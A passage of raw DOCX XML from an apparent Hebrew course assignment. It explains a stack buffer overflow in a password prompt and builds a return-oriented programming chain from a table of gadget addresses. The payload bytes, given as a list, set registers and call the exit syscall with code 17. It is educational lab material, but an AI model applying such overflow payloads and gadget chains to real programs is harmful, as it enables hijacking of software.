    <w:p w14:paraId="19A71F58" w14:textId="5C9E8AC3" w:rsidR="00622F52" w:rsidRPr="004945A8" w:rsidRDefault="001C01FE" w:rsidP="004945A8">
      <w:pPr>
        <w:bidi/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004945A8">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:rtl/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>חלק ב'</w:t>
      </w:r>
      <w:r w:rsidR="004945A8" w:rsidRPr="004945A8">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:rtl/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBA4BAB" w14:textId="6FF31021" w:rsidR="001C01FE" w:rsidRDefault="00CC5EFC" w:rsidP="001C01F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בעיה בקריאה לפונקציה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היא שהקלט אותו מכניס המשתמש יכול להיות גדול מגדול ה-</w:t>
      </w:r>
      <w:r w:rsidR="0012592A">
        <w:t>buffer</w:t>
      </w:r>
      <w:r w:rsidR="0012592A">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> ובכך לדרוס ערכים קודמים במחסנית בעת כתיבתו אליה</w:t>
      </w:r>
      <w:r w:rsidR="009E1E18">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> (שכן קריאה מתבצעת לכתובת זיכרון</w:t>
      </w:r>
      <w:r w:rsidR="005E6B2B">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> והשימוש הסטנדרטי הוא במחסנית), דבר שעלול להוביל להתנהגות בלתי מוגדרת.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DF1EED" w14:textId="7260995A" w:rsidR="0039293A" w:rsidRDefault="00C429D4" w:rsidP="0039293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תובת תהיה ערך </w:t>
      </w:r>
      <w:r w:rsidR="00A44962">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>ה-</w:t>
      </w:r>
      <w:r w:rsidR="00A44962">
        <w:t>ascii</w:t>
      </w:r>
      <w:r w:rsidR="00996911">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> של התווים "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00996911">
        <w:t>mMnNoOpP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00996911">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">", כלומר, </w:t>
      </w:r>
      <w:r w:rsidR="00E81CA3" w:rsidRPr="00A535E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0x50704f6f4e6e4d6d</w:t>
      </w:r>
      <w:r w:rsidR="00E81CA3">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:b/>
          <w:bCs/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CA0024">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:b/>
          <w:bCs/>
          <w:rtl/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00E81CA3">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>בסדר הפוך כי הכתיבה למחסנית נעשית מלמטה למעלה</w:t>
      </w:r>
      <w:r w:rsidR="00A535E6">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="0049091A">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> וזה מפני שמכיוון שגודל ה-</w:t>
      </w:r>
      <w:r w:rsidR="0049091A">
        <w:t>buffer</w:t>
      </w:r>
      <w:r w:rsidR="0049091A">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> המוקצה על המחסנית יהיה </w:t>
      </w:r>
      <w:r w:rsidR="00D646A2">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">24 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D646A2">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>בייטים</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D646A2">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> לפני </w:t>
      </w:r>
      <w:r w:rsidR="00B7665E">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>מה שמוקצה על ב-</w:t>
      </w:r>
      <w:r w:rsidR="00B7665E">
        <w:t>main</w:t>
      </w:r>
      <w:r w:rsidR="009F75EC">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">. לכן 24 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009F75EC">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>הבייטים</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009F75EC">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> הראשונים ישמרו על מקומות אלה והשמונה שיבואו אחרים ידרסו את הערך אליו אמורה התוכנית לחזור.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C061846" w14:textId="571CF427" w:rsidR="008D68C7" w:rsidRDefault="00670D8E" w:rsidP="008D68C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טבלה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819" w14:paraId="2410A89E" w14:textId="77777777" w:rsidTr="00B62819">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2765" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E704B91" w14:textId="77777777" w:rsidR="00B62819" w:rsidRPr="00E62A92" w:rsidRDefault="00B62819" w:rsidP="00B62819">
            <w:pPr>
              <w:bidi/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:rtl/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="0" w:name="_Hlk105452135"/>
            <w:r w:rsidRPr="00E62A92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2765" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="050FA42A" w14:textId="77777777" w:rsidR="00B62819" w:rsidRPr="00E62A92" w:rsidRDefault="00B62819" w:rsidP="00B62819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קידוד</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2766" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4419925C" w14:textId="77777777" w:rsidR="00B62819" w:rsidRPr="00E62A92" w:rsidRDefault="00B62819" w:rsidP="00B62819">
            <w:pPr>
              <w:bidi/>
              <w:jc w:val="center"/>
              <w:rPr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פקודות</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B62819" w14:paraId="5702DA36" w14:textId="77777777" w:rsidTr="00B62819">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2765" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2E217D08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1d13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2765" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55C66842" w14:textId="77777777" w:rsidR="00B62819" w:rsidRDefault="00B62819" w:rsidP="00B62819">
            <w:pPr>
              <w:bidi/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">5f </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="379A8957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3E938E85" w14:textId="77777777" w:rsidR="00B62819" w:rsidRDefault="00B62819" w:rsidP="00B62819">
            <w:pPr>
              <w:bidi/>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:t>pop %</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>rdi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DCF5BD5" w14:textId="77777777" w:rsidR="00B62819" w:rsidRDefault="00B62819" w:rsidP="00B62819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B62819" w14:paraId="4F1B4E12" w14:textId="77777777" w:rsidTr="00B62819">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2765" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="237A2FAC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0e2c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2765" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21839C19" w14:textId="77777777" w:rsidR="00B62819" w:rsidRDefault="00B62819" w:rsidP="00B62819">
            <w:pPr>
              <w:bidi/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>58</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="510830EA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424965F0" w14:textId="77777777" w:rsidR="00B62819" w:rsidRDefault="00B62819" w:rsidP="00B62819">
            <w:pPr>
              <w:bidi/>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:t>Pop %</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>rax</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14D8755E" w14:textId="77777777" w:rsidR="00B62819" w:rsidRDefault="00B62819" w:rsidP="00B62819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B62819" w14:paraId="05894E4D" w14:textId="77777777" w:rsidTr="00B62819">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2765" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="658EE7D9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114f</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2765" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36614B78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f 05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2766" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D991A0D" w14:textId="77777777" w:rsidR="00B62819" w:rsidRDefault="00B62819" w:rsidP="00B62819">
            <w:pPr>
              <w:bidi/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rtl/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>syscall</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B62819" w14:paraId="317038CF" w14:textId="77777777" w:rsidTr="00B62819">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2765" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7F8D90D3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1d11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2765" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74F9D8F9" w14:textId="77777777" w:rsidR="00B62819" w:rsidRDefault="00B62819" w:rsidP="00B62819">
            <w:pPr>
              <w:bidi/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>5e</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3005BF12" w14:textId="77777777" w:rsidR="00B62819" w:rsidRDefault="00B62819" w:rsidP="00B62819">
            <w:pPr>
              <w:bidi/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>41 5f</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="677FDDB1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F68CC6F" w14:textId="77777777" w:rsidR="00B62819" w:rsidRDefault="00B62819" w:rsidP="00B62819">
            <w:pPr>
              <w:bidi/>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:t>pop %</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>rsi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="62777ED6" w14:textId="77777777" w:rsidR="00B62819" w:rsidRDefault="00B62819" w:rsidP="00B62819">
            <w:pPr>
              <w:bidi/>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">pop %r15 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D49C0A5" w14:textId="77777777" w:rsidR="00B62819" w:rsidRDefault="00B62819" w:rsidP="00B62819">
            <w:pPr>
              <w:bidi/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rtl/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>ret</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B62819" w14:paraId="670BE443" w14:textId="77777777" w:rsidTr="00B62819">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2765" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="39401FE3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0624</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2765" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C141444" w14:textId="77777777" w:rsidR="00B62819" w:rsidRDefault="00B62819" w:rsidP="00B62819">
            <w:pPr>
              <w:bidi/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>55</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="595A5582" w14:textId="77777777" w:rsidR="00B62819" w:rsidRDefault="00B62819" w:rsidP="00B62819">
            <w:pPr>
              <w:bidi/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>bf 20 2e 60 00</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="798F5023" w14:textId="77777777" w:rsidR="00B62819" w:rsidRDefault="00B62819" w:rsidP="00B62819">
            <w:pPr>
              <w:bidi/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>48 89 e5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A024ED9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ff d0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2766" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15977F53" w14:textId="77777777" w:rsidR="00B62819" w:rsidRDefault="00B62819" w:rsidP="00B62819">
            <w:pPr>
              <w:bidi/>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:t>push %</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>rbp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="6FFC583C" w14:textId="77777777" w:rsidR="00B62819" w:rsidRDefault="00B62819" w:rsidP="00B62819">
            <w:pPr>
              <w:bidi/>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:t>mov $0x602e20, %</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>edi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="3ED1E1C5" w14:textId="77777777" w:rsidR="00B62819" w:rsidRDefault="00B62819" w:rsidP="00B62819">
            <w:pPr>
              <w:bidi/>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:t>mov %</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>rsp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>, %</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>rbp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="14CF12AB" w14:textId="77777777" w:rsidR="00B62819" w:rsidRDefault="00B62819" w:rsidP="00B62819">
            <w:pPr>
              <w:bidi/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rtl/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>call *%</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>rax</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B62819" w14:paraId="36BBC9EF" w14:textId="77777777" w:rsidTr="00B62819">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2765" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4E40DCBE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0x4008bc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2765" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29614F46" w14:textId="77777777" w:rsidR="00B62819" w:rsidRDefault="00B62819" w:rsidP="00B62819">
            <w:pPr>
              <w:bidi/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>4c 01 ff</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="152AF9A3" w14:textId="77777777" w:rsidR="00B62819" w:rsidRDefault="00B62819" w:rsidP="00B62819">
            <w:pPr>
              <w:bidi/>
              <w:jc w:val="center"/>
              <w:rPr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CB7A773" w14:textId="77777777" w:rsidR="00B62819" w:rsidRDefault="00B62819" w:rsidP="00B62819">
            <w:pPr>
              <w:bidi/>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:t>add %r15, %</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>rdi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="1C9FBA53" w14:textId="77777777" w:rsidR="00B62819" w:rsidRDefault="00B62819" w:rsidP="00B62819">
            <w:pPr>
              <w:bidi/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rtl/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"> ret</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="0"/>
    <w:p w14:paraId="0A990B97" w14:textId="198D7829" w:rsidR="00670D8E" w:rsidRDefault="00E961A0" w:rsidP="00670D8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עת הרצת התוכנית, נכניס לסיסמה את המחרוזת הבאה</w:t>
      </w:r>
      <w:r w:rsidR="00875372">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C7B864" w14:textId="44B65B30" w:rsidR="00BD19AD" w:rsidRDefault="00703656" w:rsidP="00BD19AD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Aaaaaaaaaaaaaaa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DC2445">
        <w:t>\0x00\x00\x00\x00\x00\x00\x00\x00\x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DD9651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3\x1d\x40\x00\x00\x00\x00\x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746B6F1A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11\x00\x00\x00\x00\x00\x00\x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D3C9CF" w14:textId="77777777" w:rsidR="00BD19AD" w:rsidRDefault="00703656" w:rsidP="00BD19AD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>\x2c\x0e</w:t>
      </w:r>
      <w:r w:rsidR="003D775E">
        <w:t>\x40\x00\x00\x00\x00\x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA01918" w14:textId="77777777" w:rsidR="00BD19AD" w:rsidRDefault="003D775E" w:rsidP="00BD19AD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>\x3c\x00\x00\x00\x00\x00\x00\x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63478307" w14:textId="4CF1FDBD" w:rsidR="00703656" w:rsidRDefault="003D775E" w:rsidP="00BD19AD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>\x4f\x11\x40\x00\x00\x00\x00\x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365D7DBD" w14:textId="1E95A332" w:rsidR="002A62A8" w:rsidRDefault="002A62A8" w:rsidP="002A62A8">
      <w:pPr>
        <w:bidi/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">רעיון: נרצה לשנות את ערך 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להיות 17,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- 60 ואז לקרוא ל-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שאנו יודעים באיזה כתובת הוא בזיכרון מהטבלה ובכך נשיג את המטרה הכוללת.</w:t>
      </w:r>
      <w:r w:rsidR="00A96380">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E78B344" w14:textId="65BB406B" w:rsidR="00A96380" w:rsidRDefault="00A96380" w:rsidP="002F5B87">
      <w:pPr>
        <w:bidi/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>צעדים</w:t>
      </w:r>
      <w:r w:rsidR="002F5B87">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>נכניס למחסנית בעת קריאת הסיסמה את הדברים כך שיתקיימו הבאים:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33AF064B" w14:textId="5BE9C57C" w:rsidR="007C7A92" w:rsidRDefault="007C7A92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כנסת 24 תווים ראשונים כלשהם שידרסו את הערכים על המחסנית.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3B0C65" w14:textId="26ABE5B3" w:rsidR="00A96380" w:rsidRDefault="007C7A92" w:rsidP="007C7A92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הכנסת הכתובת </w:t>
      </w:r>
      <w:r>
        <w:t>0x401d13</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> כך ש</w:t>
      </w:r>
      <w:r w:rsidR="00A96380">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>נקפוץ אחרי קריאת הסיסמה לכתובת</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00A96380">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">שם בעת ביצוע </w:t>
      </w:r>
      <w:r w:rsidR="00A96380">
        <w:t>pop %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A96380">
        <w:t>rdi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A96380">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> נעדכן את </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A96380">
        <w:t>rdi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A96380">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> להיות </w:t>
      </w:r>
      <w:r w:rsidR="00A96380">
        <w:t>0x11=17</w:t>
      </w:r>
      <w:r w:rsidR="00A96380">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17ABC0CA" w14:textId="3F558F16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שבא אחרי הפקודה הקודמת לכתובת </w:t>
      </w:r>
      <w:r>
        <w:t>0x400e2c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505F0C3E" w14:textId="4C5D854A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בעת ביצוע פקודת </w:t>
      </w:r>
      <w:r>
        <w:t>pop %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נעדכן את ערכו להיות 60=</w:t>
      </w:r>
      <w:r>
        <w:t>0x3c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312EB72D" w14:textId="0BB5F3C3" w:rsidR="00A96380" w:rsidRDefault="00A96380" w:rsidP="00A96380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נקפוץ ב-</w:t>
      </w:r>
      <w:r>
        <w:t>ret</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> לכתובת </w:t>
      </w:r>
      <w:r>
        <w:t>0x40114f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> ונבצע את הקריאה ל-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>syscall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E038876" w14:textId="7EFA17E8" w:rsidR="00FA42CF" w:rsidRDefault="003100FE" w:rsidP="00FA42CF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:bidi/>
      </w:pPr>
      <w:r w:rsidRPr="003100F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1CEEB789" wp14:editId="2A80A577">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>808355</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>224790</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3721608" cy="82296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765">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>סיום התוכנית.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050BF301" w14:textId="04755D86" w:rsidR="002F5B87" w:rsidRDefault="002F5B87" w:rsidP="002F5B87">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:bidi/>
        <w:ind w:left="1800"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BA81356" w14:textId="684BC9D1" w:rsidR="002F5B87" w:rsidRDefault="00E961A0" w:rsidP="002F5B8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lastRenderedPageBreak/>
        <w:t>בעת הרצת התוכנית, נכניס לסיסמה את המחרוזת הבאה</w:t>
      </w:r>
      <w:r w:rsidR="002F5B87">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
